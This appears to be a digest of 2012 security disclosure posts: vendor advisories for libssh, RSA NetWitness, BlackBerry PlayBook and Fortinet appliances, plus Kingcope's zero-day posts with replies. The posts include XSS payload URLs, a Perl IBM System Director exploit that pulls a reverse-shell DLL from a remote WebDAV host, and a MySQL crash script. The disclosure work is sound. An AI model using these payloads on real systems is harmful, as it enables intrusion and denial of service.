[SECURITY] [DSA 2577-1] libssh security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian Security Advisory DSA-2577-1 secur...@debian.org http://www.debian.org/security/ Yves-Alexis Perez December 01, 2012 http://www.debian.org/security/faq - - Package: libssh Vulnerability : several Problem type : remote Debian-specific: no CVE ID : CVE-2012-4559 CVE-2012-4561 CVE-2012-4562 Debian Bug Multiple vulnerabilities were discovered in libssh by Florian Weimer and Xi Wang: CVE-2012-4559: multiple double free() flaws CVE-2012-4561: multiple invalid free() flaws CVE-2012-4562: multiple improper overflow checks Those could lead to a denial of service by making an ssh client linked to libssh crash, and maybe even arbitrary code execution. For the stable distribution (squeeze), these problems have been fixed in version 0.4.5-3+squeeze1. For the testing distribution (wheezy), these problems have been fixed in version 0.5.3-1. For the unstable distribution (sid), these problems have been fixed in version 0.5.3-1. We recommend that you upgrade your libssh packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v2.0.19 (GNU/Linux) iQEcBAEBCgAGBQJQuhCHAAoJEG3bU/KmdcClhN8H/2WeI/NZK6IvKI3JKRniLQxn Z4RnjjW1au4yZ4b32+qVpLYQ0m8v5kuT5jR2geN95ZXCqk4iY4Jzg38iC1b2CPT5 8hs8y8uvzHwTgia/Rvi4fb9JnDun7bOn3ZInTGkSPpMx+bK38hRKLJ3BOzHsIfwD WbLlm+Emhd+MJLj3GWoTudd/2wift1ATN7vQG+Dy+budAu9sVv2g3d3fvHGo9ggG L6XCPRFzONwMgQT6jAwi2GcZYzJ8xK7KP4ELzjnf5yMKxuz2l026mhFK1JwErfWy N/Rit3gcQ4hek+VSM9JCC5l9lzkvzE6Ldkc1CZu+kkU1Itt2Lez6zfwIJVdYRdc= =pMqn -END PGP SIGNATURE-
ESA-2012-052 RSA NetWitness Informer Cross-Site Request Forgery and Click-jacking Vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ESA-2012-052: RSA NetWitness Informer Cross-Site Request Forgery and Click-jacking Vulnerabilities EMC Identifier: ESA-2012-052 CVE Identifier: CVE-2012-4608 CVE Identifier: CVE-2012-4609 Severity Rating: CVSS v2 Base Score: 6. 8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) Affected Products: RSA NetWitness Informer versions prior 2.0.5.6 Vulnerability Summary: RSA NetWitness Informer web interface is susceptible to vulnerabilities that could be potentially exploited by malicious users to compromise the affected systems. Vulnerability Details: RSA NetWitness Informer web interface is susceptible to cross-site request forgery (CVE-2012-4608) and click-jacking (CVE-2012-4609) vulnerabilities. These vulnerabilities could be potentially exploited by malicious people by tricking an authenticated user to click on specially-crafted links. This may lead to execution of malicious html requests or scripts in the context of the authenticated user. Problem Resolution: It is recommended that the Informer patch (v2.0.5.6) is downloaded from SCOL and installed as soon as possible. Severity Rating: For an explanation of Severity Ratings, refer to the Knowledge Base Article, Security Advisories Severity Rating at https://knowledge.rsasecurity.com/scolcms/knowledge.aspx?solution=a46604. RSA recommends all customers take into account both the base score and any relevant temporal and environmental scores which may impact the potential severity associated with particular security vulnerability. Obtaining Documentation: To obtain RSA documentation, log on to RSA SecurCare Online at https://knowledge.rsasecurity.com and click Products in the top navigation menu. Select the specific product whose documentation you want to obtain. Scroll to the section for the product version that you want and click the set link. Obtaining More Information: For more information about RSA SecurID, visit the RSA web site at http://www.rsa.com/node.aspx?id=1156. Getting Support and Service: For customers with current maintenance contracts, contact your local RSA Customer Support center with any additional questions regarding this RSA SecurCare Note. For contact telephone numbers or e-mail addresses, log on to RSA SecurCare Online at https://knowledge.rsasecurity.com, click Help Contact, and then click the Contact Us - Phone tab or the Contact Us - Email tab. General Customer Support Information: http://www.rsa.com/node.aspx?id=1264 RSA SecurCare Online: https://knowledge.rsasecurity.com EOPS Policy: RSA has a defined End of Primary Support policy associated with all major versions. Please refer to the link below for additional details. http://www.rsa.com/node.aspx?id=2575 SecurCare Online Security Advisories RSA, The Security Division of EMC, distributes SCOL Security Advisories in order to bring to the attention of users of the affected RSA products important security information. RSA recommends that all users determine the applicability of this information to their individual situations and take appropriate action. The information set forth herein is provided as is without warranty of any kind. RSA disclaim all warranties, either express or implied, including the warranties of merchantability, fitness for a particular purpose, title and non-infringement. In no event shall RSA or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if RSA or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. About RSA SecurCare Notes Security Advisories Subscription RSA SecurCare Notes Security Advisories are targeted e-mail messages that RSA sends you based on the RSA product family you currently use. If youd like to stop receiving RSA SecurCare Notes Security Advisories, or if youd like to change which RSA product family Notes Security Advisories you currently receive, log on to RSA SecurCare Online at https://knowledge.rsasecurity.com/scolcms/help.aspx?_v=view3. Following the instructions on the page, remove the check mark next to the RSA product family whose Notes Security Advisories you no longer want to receive. Click the Submit button to save your selection. EMC Product Security Response Center security_al...@emc.com http://www.emc.com/contact-us/contact/product-security-response-center.html -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (Cygwin) iEUEARECAAYFAlC5Co0ACgkQtjd2rKp+ALwlggCfQMIjkYs0vN/uMkPUvn9umdxp +asAl3heb7xu2Tx6AdSeM9jdIL+6AGw= =9RtB -END PGP SIGNATURE-
Low severity flaw in RIM BlackBerry PlayBook OS browser
Summary The web browser which comes as part of the RIM BlackBerry PlayBook OS can be tricked into disclosing the contents of local files through the planting of a malicious HTML file through the standard download mechanism. It should be noted that in order to exploit this issue, user interaction is required as the user will need to confirm the download of the malicious HTML file. After discussions with the vendor, CVE-2012-5828 was assigned to this vulnerability. Current As of 1st Novmeber 2012, the state of the vulnerability is believed to be as follows. RIM have begun shipping a patch which it is believed successfully resolves the reported issue. Thanks Nth Dimension would like to thank all the security folk at RIM, in particular the BlackBerry Incident Response team for the way they worked to resolve the issue. -- Tim Brown mailto:t...@nth-dimension.org.uk http://www.nth-dimension.org.uk/ -BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Nth Dimension Security Advisory (NDSA20121030) Date: 30th October 2012 Author: Tim Brown mailto:t...@nth-dimension.org.uk URL: http://www.nth-dimension.org.uk/ / http://www.machine.org.uk/ Product: RIM BlackBerry PlayBook OS 1.0.8.6067 http://www.rim.com/products/blackberry_tablets.shtml Vendor: RIM http://www.rim.com/ Risk: Low Summary The web browser which comes as part of the RIM BlackBerry PlayBook OS can be tricked into disclosing the contents of local files through the planting of a malicious HTML file through the standard download mechanism. It should be noted that in order to exploit this issue, user interaction is required as the user will need to confirm the download of the malicious HTML file. After discussions with the vendor, CVE-2012-5828 was assigned to this vulnerability. Solutions Nth Dimension recommends that the vendor supplied patches should be applied. Technical Details It was identified that the PlayBook web browser could be forced to download rather than render HTML files and that whilst the browser does prompt the user to confirm the location of the download, this download process defaults to an attacker chosen location. Furthermore, once downloaded, it is possible to use the Location header to load the file from the attacker's chose location using the file:// URL handler in such a manner that the downloaded HTML then has trusted access to the PlayBook filing system. It is possible to craft a HTML download which when opened will lead to arbitrary JavaScript being executed in the local context. The file:// URL handler is trusted to execute across domains. History On 12th February 2012, Nth Dimension supplied a PoC exploit for this issue to representatives of RIM. BBSIRT responded on the 20th to confirm that they had recieved the report and were investigating. RIM further notified Nth Dimension to confirm that all reported vulnerabilities were handled based on CVSS and that only critical vulnerabilities were deemed candidates for out-of-band patching. Less critical issues would however be addressed in future product updates. Nth Dimension responded on 7th March 2012 to confirm that they agreed with this approach and that in their opinion the issue was not critical and did not warrant an expedited response. Nth Dimension asked to be kept in the loop regarding the release of a patch for this issue in due course. On 19th September 2012, Nth Dimension asked for an update, in particular to establish whether a CVE had been assigned by RIM for this issue. On 1st November 2012, RIM responded to say that the The changes for the issues are in the latest 2.1 builds for PlayBook. The build is currently available for WiFi only PlayBooks and weâre working with our carrier partners for testing and availability for build for the in-market cellular-enabled PlayBooks. On 6th November 2012, RIM confirm that CVE-2012-5828 has been assigned. They also confirm they believe testing of cellular PlayBooks will be completed by the end of the month. Nth Dimension repond, proposing 1st Deceber 2012 as the embargo date. Current As of 1st Novmeber 2012, the state of the vulnerability is believed to be as follows. RIM have begun shipping a patch which it is believed successfully resolves the reported issue. Thanks Nth Dimension would like to thank all the security folk at RIM, in particular the BlackBerry Incident Response team for the way they worked to resolve the issue. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) iQIcBAEBCAAGBQJQuU6xAAoJEPJhpTVyySo7xcoQAM7KB/2KYIq/IElrO15jr/hH 8Pytj9Q+k0VTmousVUWs5EP+uurZ28dGH8QNdsBv/kmp9M6gPQbex38pVVp+UJxh DcVoGhVJLsrzATQH+1LH/zVVkV4idERSQvGMjbikHWMdObfr6H37iN/UwK1+O27T tFQkIbM/rRNZk/OUz+B25D+2C53tdjTsCStkbnmYXKBlMYf0h3M28sFR3bcB5mBg MFNO7Vr/t16NdFRN+MPgfiRZTATH2gCqklMoe8rmQbu+Fumf1+7T5jlnXORUIiUb tTKvDjw9o0dL513b58JuIsheiyx0IlvGo4RyfXfWRAZaZiTPSnbzPwl83Bj1JpW+ PJ4Z+4yKcwQcRIfvCDH6vc8o4uMTM7g9SMuLxZBoZN3mFUAOLwy9wJde+w8bmpFA
FortiGate FortiDB 2kB 1kC 400B - Cross Site Vulnerability
Title: == FortiGate FortiDB 2kB 1kC 400B - Cross Site Vulnerability Date: = 2012-11-29 References: === http://www.vulnerability-lab.com/get_content.php?id=558 VL-ID: = 558 Common Vulnerability Scoring System: 2.5 Introduction: = Targeting large enterprises the FortiDB-2000B appliance provides scalable database security and compliance solution. Utilizing its flexible policy framework, the FortiDB-2000B allows quick and easy implementation of internal IT control frameworks for database activity monitoring (DAM/DAA), IT audit, and regulatory compliance. Designed for mid-sized enterprises, the FortiDB-1000C appliance provides a comprehensive database security and compliance solution. Through its web-based interface, the FortiDB-1000C centrally monitors, audits and scans multiple distributed, heterogeneous databases. This ensures consistent database security policies across the organization without imposing high management burdens on your database admin and IT staff. The FortiDB-400B appliance provides a cost effective database security and compliance solution for small to mid-size enterprises in a quick to implement, easy to manage package. It scans databases for vulnerabilities, monitors, and audits databases activities, and generates compliance reports. Its intuitive web-based interface ensures ease of configuration, minimizing the management burden on your database administrators and IT staff. (Copy of the Vendor Homepage: http://www.fortinet.com/products/fortidb ) Abstract: = The Vulnerability Laboratory Research Team discovered a Cross Site Scripting Vulnerability in FortiGates FortiDB 2kB 1kC 400B. Report-Timeline: 2012-05-06: Researcher Notification Coordination 2012-05-10: Vendor Notification 2012-06-12: Vendor Response/Feedback 2012-10-24: Vendor Fix/Patch 2012-11-29: Public or Non-Public Disclosure Status: Published Affected Products: == Fortigate Product: FortiDB - Database Security Appliance v2000B; 1000C 400B Exploitation-Technique: === Remote Severity: = Medium Details: A non-persistent input validation vulnerability is detected in FortiGates FortiDB Appliance 2000B 1000C 400B. The vulnerability allows remote attackers to implement/inject malicious script code on the application side (persistent). The vulnerability is located in the Java Number Format Exception Handling module with the bound vulnerable output listing. The bug is on application side the execution is non-persistent out of the object exception-handling web application appliance context. Exploitation requires low or medium user inter action. Successful exploitation of the vulnerability can lead to session hijacking (manager/admin) or stable (persistent) context manipulation. Vulnerable Module(s): [+] Java Number Format Exception Handling Affected Function(s): [+] (Output) Listing Proof of Concept: = The vulnerability can be exploited by remote attacker with medium or high required user inter action. For demonstration or reproduce ... Review: Java Number Format Exception-Handling - Listing [Output] Error pre class=errorExceptionCausejava.lang.NumberFormatException: For input string: [NON PERSISTENT SCRIPT CODE!])' = at= java.lang.numberformatexception. forinputstring(numberformatexception.java:48)= java.lang.long.parselong(long.java:410)= org.apache.myfaces.orchestra.conversation.conversationmanager.findconversationcontextid(conversationmanager.java:157)= org.apache.myfaces.orchestra.conversation.conversationmanager.getcurrentrootconversationcontext(conversationmanager.java:564)= org.apache.myfaces.orchestra.lib.jsf.contextlockrequesthandler.init(contextlockrequesthandler.java:87)= org.apache.myfaces.orchestra.lib.jsf.orchestrafacescontextfactory$1.init= (OrchestraFacesContextFactory.java:119) at ... PoC: http://utm-waf.127.0.0.1:1339/fortidb/admin/auditTrail.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C http://utm-waf.127.0.0.1:1339/fortidb/mapolicymgmt/targetsMonitorView.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C http://utm-waf.127.0.0.1:1339/fortidb/vascan/globalsummary.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C http://utm-waf.127.0.0.1:1339/fortidb/vaerrorlog/vaErrorLog.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C http://utm-waf.127.0.0.1:1339/fortidb/database/listTargetGroups.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C http://utm-waf.127.0.0.1:1339/fortidb/sysconfig/listSystemInfo.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C
FortiWeb 4kC,3kC,1kC VA - Cross Site Vulnerabilities
Title: == FortiWeb 4kC,3kC,1kC VA - Cross Site Vulnerabilities Date: = 2012-12-01 References: === http://www.vulnerability-lab.com/get_content.php?id=702 VL-ID: = 702 Common Vulnerability Scoring System: 2.1 Introduction: = FortiWeb web application firewalls protect, balance, and accelerate your web applications, databases, and any information exchanged between them. Whether you are protecting applications delivered over a large enterprise, service provider, or cloud-based provider network, FortiWeb appliances will reduce deployment time and simplify security management. Fortinet s FortiWeb™ has passed ICSA Web Application Firewall Certification. The latest model being tested is FortiWeb 1000C. ICSA Labs certifications are evidence of FortiWeb s commitment to uphold the industry s highest security standards. Achieving this certification ensures that FortiWeb™ customers benefit from best practices in the security industry for all their Web application needs. (Copy of the Vendor Homepage: http://www.fortinet.com/products/fortiweb/ ) Abstract: = The Vulnerability Laboratory Research Team discovered multiple cross site scripting vulnerabilities in Fortinets FortiWeb 4000C, 3000C/3000CFsx, 1000C, 400C Virtual Appliance. Report-Timeline: 2012-10-01: Researcher Notification Coordination 2012-10-11: Vendor Notification 2012-10-05: Vendor Response/Feedback 2012-11-11: Vendor Fix/Patch 2012-12-01: Public or Non-Public Disclosure Status: Published Affected Products: == Fortinet Product: FortiWeb Application Series v4000C, 3000C/3000CFsx, 1000C, 400C Virtual Appliance Exploitation-Technique: === Remote Severity: = Medium Details: A non persistent cross site scripting vulnerability is detected in Fortinets FortiWeb 4000C, 3000C/3000CFsx, 1000C, 400C Virtual Appliance. The vulnerability allows remote attackers to hijack website customer, moderator or admin sessions with low or medium required user inter action and without local privileged application user account. The vulnerability is located in the Regular Expression - Validation (pcre_expression/validate) module with the bound vulnerable redir and mkey parameters. Successful exploitation results in client side account steal, client side phishing client-side appliance module context request manipulation. Vulnerable Module(s): [+] Regular Expression - Validation Module (pcre_expression/validate) Vulnerable Parameter(s): [+] redir [+] mkey Proof of Concept: = The client side cross site scripting vulnerability can be exploited by remote attackers without application user account and with medium required user interaction. For demonstration or reproduce ... Code Review: Regular Expression - Validation Module (mkey redir) trtd table class=footer cellpadding=0 cellspacing=0 trtd input class=button type=button value=Return onclick=if (window.opener) {window.close(); } else {document.location='/waf/pcre_expression/validate'} /td/tr /table /td/tr input type=hidden name=mkey size=22 maxlength=22 value=0[CLIENT SIDE SCRIPT CODE EXECUTION!]) input type=hidden name=validated value=-1 input type=hidden name=redir value=/success /form /table /td ... or trtd table class=footer cellpadding=0 cellspacing=0 trtd input class=button type=button value=Return onclick=if (window.opener) {window.close(); } else {document.location='/waf/pcre_expression/validate'} /td/tr /table /td/tr input type=hidden name=mkey size=22 maxlength=22 value=0[CLIENT SIDE SCRIPT CODE EXECUTION!]) input type=hidden name=validated value=-1 input type=hidden name=redir value=/success /form /table /td PoC: https://fortiweb.127.0.0.1:1336/waf/pcre_expression/validate?redir=/successmkey=0%22%3E%3Ciframe%20src=http://vuln-lab.com%20onload=alert%28%22VL%22%29%20%3C https://fortiweb.127.0.0.1:1336/waf/pcre_expression/validate?redir=/success%20%22%3E%3Ciframe%20src=http://vuln-lab.com%20onload=alert%28%22VL%22%29%20%3Cmkey=0 Solution: = The vulnerability can be patched by parsing all mkey and redir success parameter requests of the vulnerable Regular Expression - Validation module. 2012-11-11: Vendor Fix/Patch Risk: = The security risk of the non persistent cross site scripting vulnerabilities are estimated as low(+)|(-)medium. Credits: Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (b...@vulnerability-lab.com) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers
IBM System Director Remote System Level Exploit (CVE-2009-0880 extended zeroday)
IBM System Director Remote System Level Exploit (CVE-2009-0880 extended zeroday) Copyright (C) 2012 Kingcope IBM System Director has the port 6988 open. By using a special request to a vulnerable server, the attacker can force to load a dll remotely from a WebDAV share. The following exploit will load the dll from \\isowarez.de\\director\wootwoot.dll the wootwoot.dll is a reverse shell that will send a shell back to the attacker (the code has to be inside the dll initialization routine). The IBM Director exploit works on versions 5.20.3 and before, but not on 5.2.30 SP2 and above. Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0880 There was a prior CVE for it, the CVE states the attack can load local files only, using the WebDAV server remote file can be loaded too. To scan for this software you can enter the following (by using pnscan): ./pnscan -wM-POST /CIMListener/ HTTP/1.1\r\nHost: localhost\r\nContent-Length: 0\r\n\r\n -r HTTP ipblock 6988 Exploit: ---snip--- use IO::Socket; #1st argument: target host my $sock = IO::Socket::INET-new(PeerAddr = $ARGV[0], PeerPort = 6988, Proto= 'tcp'); $payload = qq{?xml version=1.0 encoding=utf-8 ? CIM CIMVERSION=2.0 DTDVERSION=2.0 MESSAGE ID=1007 PROTOCOLVERSION=1.0 SIMPLEEXPREQ EXPMETHODCALL NAME=ExportIndication EXPPARAMVALUE NAME=NewIndication INSTANCE CLASSNAME=CIM_AlertIndication PROPERTY NAME=Description TYPE=string VALUESample CIM_AlertIndication indication/VALUE /PROPERTY PROPERTY NAME=AlertType TYPE=uint16 VALUE1/VALUE /PROPERTY PROPERTY NAME=PerceivedSeverity TYPE=uint16 VALUE3/VALUE /PROPERTY PROPERTY NAME=ProbableCause TYPE=uint16 VALUE2/VALUE /PROPERTY PROPERTY NAME=IndicationTime TYPE=datetime VALUE20010515104354.00:000/VALUE /PROPERTY /INSTANCE /EXPPARAMVALUE /EXPMETHODCALL /SIMPLEEXPREQ /MESSAGE /CIM}; $req = M-POST /CIMListener/isowarez.de\\director\\wootwoot HTTP/1.1\r\n .Host: $ARGV[0]\r\n .Content-Type: application/xml; charset=utf-8\r\n .Content-Length: . length($payload) .\r\n .Man: http://www.dmtf.org/cim/mapping/http/v1.0 ; ns=40\r\n .CIMOperation: MethodCall\r\n .CIMExport: MethodRequest\r\n .CIMExportMethod: ExportIndication\r\n\r\n; print $sock $req . $payload; while($sock) { print; } ---snip--- Cheerio, Kingcope
MySQL (Linux) Stack based buffer overrun PoC Zeroday
(see attachment) Cheerio, Kingcope mysql_bufferoverrun.pl Description: Binary data
MySQL (Linux) Heap Based Overrun PoC Zeroday
(see attachment) Cheerio, Kingcope mysql_heapoverrun.pl Description: Binary data
MySQL (Linux) Database Privilege Elevation Zeroday Exploit
(see attachment) Cheerio, Kingcope mysql_privilege_elevation.pl Description: Binary data
MySQL Denial of Service Zeroday PoC
(see attachment) Kingcope 5.5.19-log on SuSE Linux DoS exploit: use Net::MySQL; use Unicode::UTF8 qw[decode_utf8 encode_utf8]; $|=1; my $mysql = Net::MySQL-new( hostname = '192.168.2.3', # Default use UNIX socket database = 'test', user = monty, password = python, debug = 1, ); $mysql-_execute_command(\x12, \x00\x00\x00\x00 foo); exit; for ($k=0;$k5;$k++) { $a .=A$k; } for ($k=0;$k5;$k++) { $a .=/A$k; } # SELECT example $mysql-query(SELECT UpdateXML('a$abccc/bd/d/a', '/a', 'efff/e') AS val1); my $record_set = $mysql-create_record_iterator; while (my $record = $record_set-each) { printf First column: %s Next column: %s\n, $record-[0], $record-[1]; } $mysql-close; Crash Log: started: /usr/local/mysql/bin/mysqld --log=/tmp/mysql55.log --user=mysql --log-bin=/tmp/logbin2 120108 12:55:28 - mysqld got signal 11 ; This could be because you hit a bug. It is also possible that this binary or one of the libraries it was linked against is corrupt, improperly built, or misconfigured. This error can also be caused by malfunctioning hardware. We will try our best to scrape up some info that will hopefully help diagnose the problem, but since we have already crashed, something is definitely wrong and this may fail. key_buffer_size=16777216 read_buffer_size=262144 max_used_connections=1 max_threads=151 thread_count=1 connection_count=1 It is possible that mysqld could use up to key_buffer_size + (read_buffer_size + sort_buffer_size)*max_threads = 133453 K bytes of memory Hope that's ok; if not, decrease some variables in the equation. Thread pointer: 0x8e6fa48 Attempting backtrace. You can use the following information to find out where mysqld died. If you see no messages after this, something went terribly wrong... stack_bottom = 0xa868b35c thread_stack 0x3 /usr/local/mysql/bin/mysqld(my_print_stacktrace+0x33)[0x83b0f63] /usr/local/mysql/bin/mysqld(handle_segfault+0x4bc)[0x813c59c] [0xe400] /usr/local/mysql/bin/mysqld(_Z16dispatch_command19enum_server_commandP3THDPcj+0x11b4)[0x81b09e4] /usr/local/mysql/bin/mysqld(_Z10do_commandP3THD+0xbc)[0x81b13ac] /usr/local/mysql/bin/mysqld(_Z24do_handle_one_connectionP3THD+0x183)[0x823eb63] /usr/local/mysql/bin/mysqld(handle_one_connection+0x3c)[0x823ebbc] /lib/libpthread.so.0(+0x5b05)[0xb771cb05] /lib/libc.so.6(clone+0x5e)[0xb74e7d5e] Trying to get some variables. Some pointers may be invalid and cause the dump to abort. Query ((nil)): is an invalid pointer Connection ID (thread ID): 12 Status: NOT_KILLED The manual page at http://dev.mysql.com/doc/mysql/en/crashing.html contains information that should help you find out what is causing the crash. Version: '5.5.19-log' socket: '/var/run/mysql/mysql.sock' port: 3306 Source distribution [New Thread 0xa8f1db70 (LWP 7907)] 120108 13:01:51 [Warning] IP address '192.168.2.150' could not be resolved: Name or service not known 120108 13:01:51 [Note] Start binlog_dump to slave_server(65), pos(, 4294967295) Program received signal SIGSEGV, Segmentation fault. [Switching to Thread 0xa8f1db70 (LWP 7907)] mysql_binlog_send (thd=0x8e6fb28, log_ident=0x8eb57a8 , pos=value optimized out, flags=65535) at /root/mysql-5.5.19/sql/sql_repl.cc:1043 1043log_file_name, (llstr(my_b_tell(log), llbuff2), llbuff2)); (gdb) x/10i $eip = 0x81bf54a mysql_binlog_send(THD*, char*, my_off_t, ushort)+1370: mov 0x8(%ecx),%edx 0x81bf54d mysql_binlog_send(THD*, char*, my_off_t, ushort)+1373: mov 0x4(%ecx),%eax 0x81bf550 mysql_binlog_send(THD*, char*, my_off_t, ushort)+1376: mov %edx,0x4(%esp) 0x81bf554 mysql_binlog_send(THD*, char*, my_off_t, ushort)+1380: mov %eax,(%esp) 0x81bf557 mysql_binlog_send(THD*, char*, my_off_t, ushort)+1383: call 0x8541560 llstr 0x81bf55c mysql_binlog_send(THD*, char*, my_off_t, ushort)+1388: mov -0x9b0(%ebp),%edx 0x81bf562 mysql_binlog_send(THD*, char*, my_off_t, ushort)+1394: lea -0x590(%ebp),%eax 0x81bf568 mysql_binlog_send(THD*, char*, my_off_t, ushort)+1400: mov %edi,0x1c(%esp) 0x81bf56c mysql_binlog_send(THD*, char*, my_off_t, ushort)+1404: lea -0x990(%ebp),%edi 0x81bf572 mysql_binlog_send(THD*, char*, my_off_t, ushort)+1410: mov %eax,0x18(%esp) (gdb) i r eax0xa8f1c804 -1460549628 ecx0x0 0 edx0xa8f1c805 -1460549627 ebx0x8e821e0149430752 esp0xa8f1be50 0xa8f1be50 ebp0xa8f1c868 0xa8f1c868 esi0xa8f1c81a -1460549606 edi0xa8f1c804 -1460549628 eip0x81bf54a0x81bf54a mysql_binlog_send(THD*, char*,
MySQL Remote Preauth User Enumeration Zeroday
(see attachment) Cheerio, Kingcope mysql_userenum.pl Description: Binary data
Re: [Full-disclosure] MySQL (Linux) Heap Based Overrun PoC Zeroday
Hi Kingcope, # As seen below $edx and $edi are fully controlled, # the current instruction is # = 0x83a6b24 free_root+180: mov(%edx),%edi # this means we landed in a place where 4 bytes can be controlled by 4 bytes # with this function pointers and GOT entries can be rewritten to execute arbritrary code Out of curiosity, is this exploitable when using hardened toolchain settings? Specifically, -z,noexecheap, -z,now, and -z,relro? For no-exec heaps., you need to be on Gentoo or other platforms which offer the remediation. Jeff On Sat, Dec 1, 2012 at 4:26 PM, king cope isowarez.isowarez.isowa...@googlemail.com wrote: (see attachment) Cheerio, Kingcope ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] MySQL (Linux) Stack based buffer overrun PoC Zeroday
Hi Kingcope, MySQL Server exploitable stack based overrun Ver 5.5.19-log for Linux and below (tested with Ver 5.1.53-log for suse-linux-gnu too) unprivileged user (any account (anonymous account?), post auth) as illustrated below the instruction pointer is overwritten with 0x41414141 bug found by Kingcope this will yield a shell as the user 'mysql' when properly exploited Out of curiosity, is this exploitable when using hardened toolchain settings? Specifically, -D_FORTIFY_SOURCES=2 and -fstack-protector-all? Jeff On Sat, Dec 1, 2012 at 4:26 PM, king cope isowarez.isowarez.isowa...@googlemail.com wrote: (see attachment) Cheerio, Kingcope ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] MySQL (Linux) Stack based buffer overrun PoC Zeroday
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On 12/01/2012 02:26 PM, king cope wrote: (see attachment) Cheerio, Kingcope So normally for MySQL issues Oracle would assign the CVE #. However in this case we have a bit of a time constraint (it's a weekend and this is blowing up quickly) and the impacts are potentially quite severe. So I've spoken with some other Red Hat SRT members and we feel it is best to get CVE #'s assigned for these issues quickly so we can refer to them properly. If Oracle security has already assigned CVE's for these please let us and the public know so we can use the correct numbers. Also if Oracle can let the public know which versions of MySQL are affected (e.g. 5.0.x, 5.1.x, 5.5.x, etc.) that would be very helpful to everyone I am sure. I am also adding MySQL, Oracle, MariaDB, OSS-SEC, Steven Christey, cve-assign and OSVDB to the CC so that everyone is aware of what is going on. http://seclists.org/fulldisclosure/2012/Dec/4 - -- Kurt Seifried Red Hat Security Response Team (SRT) PGP: 0x5E267993 A90B F995 7350 148F 66BF 7554 160D 4553 5E26 7993 -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) iQIcBAEBAgAGBQJQuu5zAAoJEBYNRVNeJnmTF8sP/10htpTkb298u/Szo3yOcRiE 8HgMwXPVGFhPh0d/avRgIocYeJxIH9oUf7xN/A53TXktgp7CZZUMhJAh4Hv5mrFn moVGxs3qBaTT8+zFa8Ea7VUqzYXUGdMNPBeyijyw18WRHu7ETrUg2pXREkr056ol GRt5BuMyzz7sdlLNCYWki+uMIxWtnyjw4ngkNCcAbDuPGdmIxwTiNQ8oOLWRgs/+ ybL0EXWIJgeBWBdsx0nlJNrL6gHqCsfZduKNl95MAdFHRMiOFrc/GQWfL81d+q86 upWQ+S7U8or/dpcD7eKInSmGvjgoFR+cF1S2lkDqBLXg2ER8aZzemaG/8p+m4ICH Cef7Zt7q5F+FaSC4wOeCmmR0SmeA1ZO1krY8Ur3oyuYr39Iegk1O48hAzAP4RbDS +m0pPFNanDuW2h9NSjAx19C2qgEMoMGCaTpJY1mfF3Zus5ctxXyYtNU1g/yIGr3f E2boYVOYW4CPJSRGkeF6n1Vf+c+Sov/0/enxJxUsf9tA58iQUSQNsI+aSj71oI3v 1Y0/Ce3FKAJRkgY374TD+K834ruhFAO9xJXdA1MSDdz4rJ1uQusIKufz3ubjHCWP KhgpV2Pp1Gq5+XGuNPKn06cNh8a/oYubMNpQBxeIbWYm6eFuUvwnSP9ki+hPLjvw fa9hdUARqamhayQbkNdH =sXhV -END PGP SIGNATURE-
Re: [Full-disclosure] MySQL (Linux) Heap Based Overrun PoC Zeroday
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On 12/01/2012 02:26 PM, king cope wrote: (see attachment) Cheerio, Kingcope So normally for MySQL issues Oracle would assign the CVE #. However in this case we have a bit of a time constraint (it's a weekend and this is blowing up quickly) and the impacts are potentially quite severe. So I've spoken with some other Red Hat SRT members and we feel it is best to get CVE #'s assigned for these issues quickly so we can refer to them properly. If Oracle security has already assigned CVE's for these please let us and the public know so we can use the correct numbers. Also if Oracle can let the public know which versions of MySQL are affected (e.g. 5.0.x, 5.1.x, 5.5.x, etc.) that would be very helpful to everyone I am sure. I am also adding MySQL, Oracle, MariaDB, OSS-SEC, Steven Christey, cve-assign and OSVDB to the CC so that everyone is aware of what is going on. Please use CVE-2012-5612 for MySQL (Linux) Heap Based Overrun PoC Zeroday - -- Kurt Seifried Red Hat Security Response Team (SRT) PGP: 0x5E267993 A90B F995 7350 148F 66BF 7554 160D 4553 5E26 7993 -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) iQIcBAEBAgAGBQJQuvEXAAoJEBYNRVNeJnmTsnsQAMcUAB1u2mbcx31EDRMKePHN njyDbDp5PkQVyfcYPtwnZgK4Uid2z1be7Dl4f1Q++FUkMO/2/I/SNu206PvMgVRA ZJIXw2o38UZUNIvD23yUOQyMLUJBqGGhfo9PiXogyyrZ27JzqTOIxv2fnRcpJCVJ 